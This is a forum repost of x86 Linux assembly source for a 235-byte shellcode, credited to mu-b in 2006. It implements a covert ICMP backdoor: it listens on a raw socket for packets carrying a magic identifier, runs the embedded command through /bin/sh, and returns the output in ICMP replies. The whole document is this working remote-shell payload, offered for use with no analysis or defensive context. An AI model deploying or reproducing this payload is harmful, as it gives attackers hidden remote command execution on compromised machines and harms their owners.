linux/x86 raw-socket ICMP/checksum shell 235 byte
[code];; Copyright (c) 2007 by <[email]mu-b@digit-labs.org[/email]>
;
; 235-byte raw-socket ICMP/checksum shell - (x86-lnx)
; by mu-b - Nov 2006
;
; icmp with identifier __flag_byte and commands in the
; following format:-
; "/bin/sh\x00-c\x00<command here>\x00"
;
; unlike *other* icmp shells, this will reply with
; 255-(sizeof icmp_hdr) bytes of output..
;
%define zero_reg esi
%define zero_reg_w si
%define sock_reg edi
%define __flag_byte 6996h
global _shell
_shell:
xor zero_reg, zero_reg
mov ebp, esp
; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
_socket:
lea ebx, [zero_reg+3]
push byte 1
push ebx
dec ebx
push ebx
dec ebx
mov ecx, esp
lea eax, [zero_reg+66h]
int 80h ; socket();
mov sock_reg, eax
; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1);
_setsockopt:
push ebx
push esp
push byte 3h
push zero_reg
push sock_reg
mov ecx, esp
mov bl, byte 0eh
mov al, byte 66h
int 80h ; setsocketopt();
; while(1)
_while_loop:
; read(sockfd, cmd, 255);
cdq
dec byte dl
mov ecx, ebp
mov ebx, sock_reg
lea eax, [zero_reg+3]
int 80h ; read();
lea ebx, [ebp+24]
xor [ebx], word __flag_byte
jne short _while_loop
; pipe(pp)
lea ebx, [ebp-8]
mov al, byte 2ah
int 80h ; pipe();
; fork()
mov al, byte 2h
int 80h ; fork();
test eax, eax
jnz short _parent
_child:
; close(pp[0])
mov ebx, [ebp-8]
mov al, byte 6h
int 80h ; close();
; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2);
lea ecx, [zero_reg+3]
; pp[1] == pp[0]+1
inc ebx
.1:
dec ecx
mov al, byte 3fh
int 80h ; dup2();
jnz .1
; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0);
push zero_reg
lea ebx, [ebp+39]
push ebx
sub ebx, byte 3
push ebx
sub ebx, byte 8
push ebx
mov ecx, esp
cdq
mov al, byte 0bh
int 80h ; execve();
_parent:
; close(pp[1])
mov ebx, [ebp-4]
lea eax, [zero_reg+6]
int 80h ; close();
_parent_read:
.1:
; read(pp[0], cmd, bytes_left);
; edx == 255
lea ecx, [ebp+28]
mov ebx, [ebp-8]
mov al, byte 3h
int 80h ; read();
test eax, eax
jl _while_loop
mov al, byte 6h
int 80h ; close();
.2:
; fix up ttl (optional?! make sure its high!)
; mov [ebp+8], byte 0ffh
; switch ip's
mov ecx, [ebp+12]
xchg [ebp+16], ecx
mov [ebp+12], ecx
; set icmp type to echo reply (optional?!)
;mov [ebp+20], word zero_reg_w
; zero checksum
;mov [ebp+22], word zero_reg_w
; set icmp type to echo and zero checksum
mov [ebp+20], zero_reg
lea ecx, [zero_reg+117]
lea esi, [ebp+20]
cdq
.3:
lodsw
add edx, eax
loop .3
lodsb
xor ah, ah
add eax, edx
mov esi, eax
shr eax, byte 16
movzx esi, si
add eax, esi
mov edx, eax
shr edx, byte 16
add eax, edx
not ax
; set checksum
mov [ebp+22], word ax
cdq
xor eax, eax
xor zero_reg, zero_reg
; struct sockaddr *
push zero_reg
push zero_reg
push dword [ebp+16]
push byte 2
; sendto(sockfd, cmd, 255, 0, ...);
mov ecx, esp
push byte 16
push ecx
push zero_reg
mov dl, byte 0ffh
push edx
push ebp
push sock_reg
mov ecx, esp
mov bl, 0bh
mov al, 66h
int 80h ; sendto();
cdq
mov ecx, ebp
mov ebx, zero_reg
mov al, 72h
int 80h ; wait();
jmp _while_loop
[/code]
页:
[1]